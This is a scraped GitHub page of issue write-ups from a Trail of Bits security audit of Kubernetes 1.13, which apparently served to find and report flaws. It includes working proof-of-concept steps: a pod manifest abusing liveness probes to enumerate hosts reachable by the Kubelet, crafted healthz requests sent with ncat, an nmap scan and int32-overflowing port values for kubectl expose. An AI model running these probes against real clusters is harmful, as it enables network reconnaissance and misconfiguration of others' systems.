trailofbits / audit-kubernetes Goto Github PK
View Code? Open in Web Editor NEWk8s audit repo
k8s audit repo
When defining a pod, it is possible to specify liveness probes. These probes are executed by the Kubelet from the Kubelet process. Thus, it is possible to gain access to networks which may otherwise be isolated away from a container.
To enumerate the host network, an attacker could submit N number of pods with TCP/HTTP host + Port specifications for the liveness probe. The attacker is then subsequently able to identify whether the host and port combination is able to be reached by the Kubelet. Example below.
Podfile:
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-http
spec:
containers:
- name: liveness
image: k8s.gcr.io/liveness
args:
- /server
ports:
livenessProbe:
httpGet:
host: 172.31.6.71
path: /
port: 8000
httpHeaders:
- name: Custom-Header
value: Awesome
initialDelaySeconds: 3
periodSeconds: 3
Pod deployment:
root@node1:/home/ubuntu# date
Mon Apr 8 14:44:29 UTC 2019
root@node1:/home/ubuntu# kubectl apply -f probe_test.yaml
pod/liveness-http created
root@node1:/home/ubuntu# date
Mon Apr 8 14:44:34 UTC 2019
Accessing another host on the network:
ubuntu@ip-172-31-6-71:~$ date
Mon Apr 8 14:44:26 UTC 2019
ubuntu@ip-172-31-6-71:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
172.31.24.249 - - [08/Apr/2019 14:44:40] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:43] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:46] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:49] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:52] "GET / HTTP/1.1" 200 -
Liveness information yielded by the pod:
Ready: True
Restart Count: 0
Liveness: http-get http://172.31.6.71:8000/ delay=3s timeout=1s period=3s #success=1 #failure=3
Pod status denoting the external host and port is available:
root@node1:/home/ubuntu# kubectl get pods
NAME READY STATUS RESTARTS AGE
liveness-http 1/1 Running 0 41s
The healthz
check running on the apiserver
does not appear to correctly handle responses of unexpected sizes, resulting in a response containing metadata about the structures in the service response ( string sizes). The following shows executing a request against the healthz
endpoint:
root@ubuntu-test-1:~# cat thing3
GET /healthz?verbose&exclude=test,test HTTP/1.1
Host: 172.17.0.4:6443
Accept: */*
root@ubuntu-test-1:~# cat thing3 |ncat 172.17.0.4 6443 --ssl
HTTP/1.1 200 OK
Date: Wed, 24 Apr 2019 21:11:41 GMT
Content-Length: 825
Content-Type: text/plain; charset=utf-8
[+]ping ok
[+]log ok
[+]etcd ok
[+]poststarthook/generic-apiserver-start-informers ok
[+]poststarthook/start-apiextensions-informers ok
[+]poststarthook/start-apiextensions-controllers ok
[+]poststarthook/bootstrap-controller ok
[+]poststarthook/rbac/bootstrap-roles ok
[+]poststarthook/scheduling/bootstrap-system-priority-classes ok
[+]poststarthook/ca-registration ok
[+]poststarthook/start-kube-apiserver-admission-initializer ok
[+]poststarthook/start-kube-aggregator-informers ok
[+]poststarthook/apiservice-registration-controller ok
[+]poststarthook/apiservice-status-available-controller ok
[+]poststarthook/apiservice-openapi-controller ok
[+]poststarthook/kube-apiserver-autoregistration ok
[+]autoregister-completion ok
warn: some health checks cannot be excluded: no matches for "test,test"
healthz check passed
The verbose
parameter shows detailed information about the request which is being executed and the exclude
parameter instructs the endpoint which health checks should be skipped. By providing a large exclude
list, the service responds with artifacts related to response object sizes, which can be seen in the following response:
root@ubuntu-test-1:~# cat thing2
GET /healthz?verbose&exclude=tddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testdstdd HTTP/1.1
Host: 172.17.0.4:6443
Accept: */*
root@ubuntu-test-1:~# cat thing2 |ncat 172.17.0.4 6443 --ssl
HTTP/1.1 200 OK
Date: Wed, 24 Apr 2019 21:12:35 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
f89
[+]ping ok
[+]log ok
[+]etcd ok
[+]poststarthook/generic-apiserver-start-informers ok
[+]poststarthook/start-apiextensions-informers ok
[+]poststarthook/start-apiextensions-controllers ok
[+]poststarthook/bootstrap-controller ok
[+]poststarthook/rbac/bootstrap-roles ok
[+]poststarthook/scheduling/bootstrap-system-priority-classes ok
[+]poststarthook/ca-registration ok
[+]poststarthook/start-kube-apiserver-admission-initializer ok
[+]poststarthook/start-kube-aggregator-informers ok
[+]poststarthook/apiservice-registration-controller ok
[+]poststarthook/apiservice-status-available-controller ok
[+]poststarthook/apiservice-openapi-controller ok
[+]poststarthook/kube-apiserver-autoregistration ok
[+]autoregister-completion ok
warn: some health checks cannot be excluded: no matches for "tddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testdstdd"
15
healthz check passed
0
In this response, the Content-Length
header is removed and replaced by Transfer-Encoding: chunked
and string sizes are included as seen in the following excerpt:
Transfer-Encoding: chunked
f89
[+]ping ok
It was not immediately clear what the source of these artifacts was and as there was no security implication a root cause was not fully investigated. The following function defines the healthz
service handler:
kubernetes/healthz.go at v1.13.4 ยท kubernetes/kubernetes ยท GitHub
Carry out request with a long exclude
parameter as seen in the finding description.
Ensure services are able to cleanly handle unexpected user input.
Don't do this:
pkg/kubectl/cmd/taint/taint.go
218: conflictTaint := fmt.Sprintf("{\"%s\":\"%s\"}", taintRemove.Key, taintRemove.Effect)
pkg/kubectl/cmd/get/customcolumn.go
62: return fmt.Sprintf("{.%s}", fieldSpec), nil
also, @tomsteele pointed out that YAML could be an interesting direction (but we'll probably push out another issue there). There's some Mustache and other weirdness in here as well...
A Malicious Internal User is a user, such as an administrator or developer, who uses their privileged position maliciously against the system, or stolen credentials used for the same. The scenario is more focused on what logging/auditing/roles/NAC can do to prevent such credential abuse.
When placing a large manifest within the kubelet manifest directory, kubelet will attempt to boot the spec defined within the manifest. This is attempted without performing size validation on the file, and will result in an OOM error. Kubelet will then recover when the underlying system is able to recover, and attempt to start the spec again. This leads to an unrecoverable loop.
In kubelet/prober/prober.go
:
func extractPort(param intstr.IntOrString, container v1.Container) (int, error) {
port := -1
var err error
switch param.Type {
// (...)
case intstr.String:
if port, err = findPortByName(container, param.StrVal); err != nil {
// Last ditch effort - maybe it was an int stored as string?
if port, err = strconv.Atoi(param.StrVal); err != nil {
return port, err
}
}
The code incorrectly doesn't handle the case mentioned in the comment: if the port parsing succeeds, so err == nil
the port
is never used. Currently, this branch may return either 0 or maximum integer value (when param.StrVal
is too big to be parsed).
The extractPort
function is called twice by runProbe
when extracting HTTP port in src/kubernetes-1.13.4/pkg/kubelet/prober/prober.go:160
and TCP socket port in src/kubernetes-1.13.4/pkg/kubelet/prober/prober.go:176
.
It seems that this value comes somewhere from POD configuration.
The outcome of wrong value could probably be that a given POD is not detected when probing it?
By default, bufio.Scanner
does not set a capacity so an attacker with control over a file that's being read in can DoS the system with OoM anywhere that the following pattern is met:
pkg/kubectl/cmd/get/customcolumn.go:91: lineScanner := bufio.NewScanner(bytes.NewBufferString(line))
pkg/kubectl/cmd/get/customcolumn.go-92- lineScanner.Split(bufio.ScanWords)
basically, anywhere that you create a NewScanner
but do not call Buffer
on it with a fixed buffer (len
of 0, but cap
of some fixed size) you can effectively OoM via Scanner
. There's lots of it via the code base, I first noticed it because ABAC is actually a list of single-line JSON objects (screams internally)
from https://github.com/kubernetes/kubernetes/blob/master/cmd/linkcheck/links.go#L133-L140
Some background: https://github.com/trailofbits/audit-kubernetes/blob/master/notes/dominik.czarnota/linkcheck.md
retryAfter := resp.Header.Get("Retry-After")
if seconds, err := strconv.Atoi(retryAfter); err != nil {
backoff = seconds + 10
}
fmt.Fprintf(os.Stderr, "Got %d visiting %s, retry after %d seconds.\n", resp.StatusCode, string(URL), backoff)
TLDR: If more complex (see below).Atoi
fails the seconds
is always 0; if it doesn't the seconds
retrieved from Retry-After
header are not used.
Also:
Retry-After
header - otherwise someone can stall/delay/sleep the build for a long timelinkcheck
over a malicious branch)The issue is still present on master branch, as of the time of writing this issue: https://github.com/kubernetes/kubernetes/blob/e739b553747940324cf4a91429aea905371f89a1/cmd/linkcheck/links.go#L132-L140
Starting Nmap 7.60 ( https://nmap.org ) at 2019-04-18 21:56 UTC
Initiating Connect Scan at 21:56
Scanning 2 hosts [1000 ports/host]
Discovered open port 22/tcp on 172.31.28.169
Discovered open port 22/tcp on 172.31.24.249
Discovered open port 179/tcp on 172.31.28.169
Discovered open port 179/tcp on 172.31.24.249
Discovered open port 8081/tcp on 172.31.24.249
Completed Connect Scan against 172.31.28.169 in 0.06s (1 host left)
Completed Connect Scan at 21:56, 0.06s elapsed (2000 total ports)
Nmap scan report for 172.31.24.249
Host is up, received user-set (0.0024s latency).
Scanned at 2019-04-18 21:56:06 UTC for 0s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
179/tcp open bgp syn-ack
8081/tcp open blackice-icecap syn-ack
Nmap scan report for 172.31.28.169
Host is up, received user-set (0.0024s latency).
Scanned at 2019-04-18 21:56:06 UTC for 0s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
179/tcp open bgp syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 2 IP addresses (2 hosts up) scanned in 0.10 seconds
Mouter...
By looking over some atoi related issues I found out such todo:
// TODO(mg): check if the pubkey matches the private key
from
https://github.com/miekg/dns/blob/master/dnssec_keyscan.go#L26-L42
This is a vendor code so it might be out of scope - but maybe Kubernetes uses this and maybe there is a real vuln?
TODO: to be checked
An External Attacker is an attacker who is external to the cluster and is unauthenticated. In our case, that would be an attacker using our Wordpress. I think Jenkins abuse would fall under Malicious Internal User.
This issue will contain write-ups/PoCs of atoi+int conversion overflows that we found, so we can add it to the report later.
// updatePodContainers updates PodSpec.Containers.Ports with passed parameters.
func updatePodPorts(params map[string]string, podSpec *v1.PodSpec) (err error) {
port := -1
hostPort := -1
if len(params["port"]) > 0 {
port, err = strconv.Atoi(params["port"]) // <-- this should parse port as strconv.ParseUint(params["port"], 10, 16)
if err != nil {
return err
}
}
// (...)
// Don't include the port if it was not specified.
if len(params["port"]) > 0 {
podSpec.Containers[0].Ports = []v1.ContainerPort{
{
ContainerPort: int32(port), // <-- this should later just be uint16(port)
},
}
That's called via kubectl expose
, so let's see it in action.
For the sake of example, I've created a deployment:
root@k8s-1:~# cat nginx.yml
apiVersion: apps/v1 # for versions before 1.9.0 use apps/v1beta2
kind: Deployment
metadata:
name: nginx-deployment
spec:
selector:
matchLabels:
app: nginx
replicas: 1 # tells deployment to run 2 pods matching the template
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.7.9
ports:
- containerPort: 80
root@k8s-1:~# kubectl create -f nginx.yml
deployment.apps/nginx-deployment created
root@k8s-1:~# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-deployment-76bf4969df-nskjh 1/1 Running 0 2m14s
I have no service related to this deployment atm:
root@k8s-1:~# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 30m
Let's create a service and expose/specify port
such that int32(4294967377) == 81
:
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 4294967377 --target-port 80
service/nginx-deployment exposed
This got exposed, so let's see services:
root@k8s-1:/home/vagrant# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 42m
nginx-deployment ClusterIP 10.233.25.138 <none> 81/TCP 2s
It's there with port 81, let's connect:
root@k8s-1:/home/vagrant# curl 10.233.25.138:81
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>
It works.
But there is more. The target-port
can also be overflowed and it shows a bit more interesting results.
Let's delete the service:
root@k8s-1:/home/vagrant# kubectl delete service nginx-deployment
service "nginx-deployment" deleted
root@k8s-1:/home/vagrant# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 45m
root@k8s-1:/home/vagrant#
And now expose it again, now also overflowing the target port:
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 4294967377 --target-port 4294967376
E0402 09:25:31.888983 3625 intstr.go:61] value: 4294967376 overflows int32
goroutine 1 [running]:
runtime/debug.Stack(0xc000e54eb8, 0xc4f1e9b8, 0xa3ce32e2a3d43b34)
/usr/local/go/src/runtime/debug/stack.go:24 +0xa7
k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr.FromInt(0x100000050, 0xa, 0x100000050, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr/intstr.go:61 +0x62
k8s.io/kubernetes/pkg/kubectl/generate/versioned.generateService(0xc000d4b770, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:199 +0x1056
k8s.io/kubernetes/pkg/kubectl/generate/versioned.ServiceGeneratorV2.Generate(0xc000d4b770, 0x410bc20, 0x536d2d6, 0xa, 0xc000e55350)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:50 +0x2b
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose.func1(0xc0004684d0, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:311 +0x45c
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit.func1(0xc0004684d0, 0x0, 0x0, 0x8, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:315 +0xdc
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit.func1(0xc0004684d0, 0x0, 0x0, 0xa, 0xc000e55838)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:339 +0x111
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit.func1(0xc0004684d0, 0x0, 0x0, 0x38, 0xc000f7ad40)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:377 +0x81b
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Info).Visit(0xc0004684d0, 0xc000f7ad40, 0xc000000300, 0xb9)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:92 +0x38
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.VisitorList.Visit(0xc0004a2a50, 0x1, 0x1, 0xc000f7ad40, 0x744dab9, 0x76)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:177 +0x63
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit(0x74a78e0, 0xc000f936a0, 0x74bb200, 0xc00059de30, 0xc000dbcff0, 0xc000f93720, 0x744da58, 0x56)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:372 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit(0x74a78a0, 0xc000f79980, 0xc000f7ad00, 0xc00007d8b0, 0xc00007e2a0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:334 +0xc3
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit(0x74a7820, 0xc0004a2ab0, 0xc000f936e0, 0x3, 0x4, 0xc000f8ef60, 0xc000000300, 0xc000e55b68)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:306 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Result).Visit(0xc000e17300, 0xc000f8ef60, 0x10, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/result.go:99 +0x62
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose(0xc0002dc620, 0xc00052d400, 0xc00095f560, 0x2, 0x6, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:235 +0x2e7
k8s.io/kubernetes/pkg/kubectl/cmd/expose.NewCmdExposeService.func1(0xc00052d400, 0xc00095f560, 0x2, 0x6)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:138 +0x9d
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).execute(0xc00052d400, 0xc00095f500, 0x6, 0x6, 0xc00052d400, 0xc00095f500)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:760 +0x2cc
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).ExecuteC(0xc000c91680, 0x4, 0xc000c91680, 0xc000a51f10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:846 +0x2fd
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).Execute(0xc000c91680, 0x7, 0xc0002e8a00)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:794 +0x2b
main.main()
_output/dockerized/go/src/k8s.io/kubernetes/cmd/hyperkube/main.go:64 +0x18f
service/nginx-deployment exposed
What is interesting here, we got an error: E0402 09:25:31.888983 3625 intstr.go:61] value: 4294967376 overflows int32
but also information, that it got exposed: service/nginx-deployment exposed
.
Let's see:
root@k8s-1:/home/vagrant# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 46m
nginx-deployment ClusterIP 10.233.59.190 <none> 81/TCP 35s
It is there:
root@k8s-1:/home/vagrant# curl 10.233.59.190:81
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 66666666666666 --target-port 80
The Service "nginx-deployment" is invalid: spec.ports[0].port: Invalid value: 184298154: must be between 1 and 65535, inclusive
The same validation is there for target-port
(a check whether the port is in 1<=port<=65535
range) but if we fire an overflow here, we will get an extra stack trace (the same as before):
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 66666666666666 --target-port 66666666666667
E0402 09:27:11.832160 4123 intstr.go:61] value: 66666666666667 overflows int32
goroutine 1 [running]:
runtime/debug.Stack(0xc000e30eb8, 0x556f36cd, 0xba2ce4369ebc04a)
/usr/local/go/src/runtime/debug/stack.go:24 +0xa7
k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr.FromInt(0x3ca20afc2aab, 0xe, 0x3ca20afc2aab, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr/intstr.go:61 +0x62
k8s.io/kubernetes/pkg/kubectl/generate/versioned.generateService(0xc000b90990, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:199 +0x1056
k8s.io/kubernetes/pkg/kubectl/generate/versioned.ServiceGeneratorV2.Generate(0xc000b90990, 0x410bc20, 0x536d2d6, 0xa, 0xc000e31350)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:50 +0x2b
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose.func1(0xc000b47730, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:311 +0x45c
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit.func1(0xc000b47730, 0x0, 0x0, 0x8, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:315 +0xdc
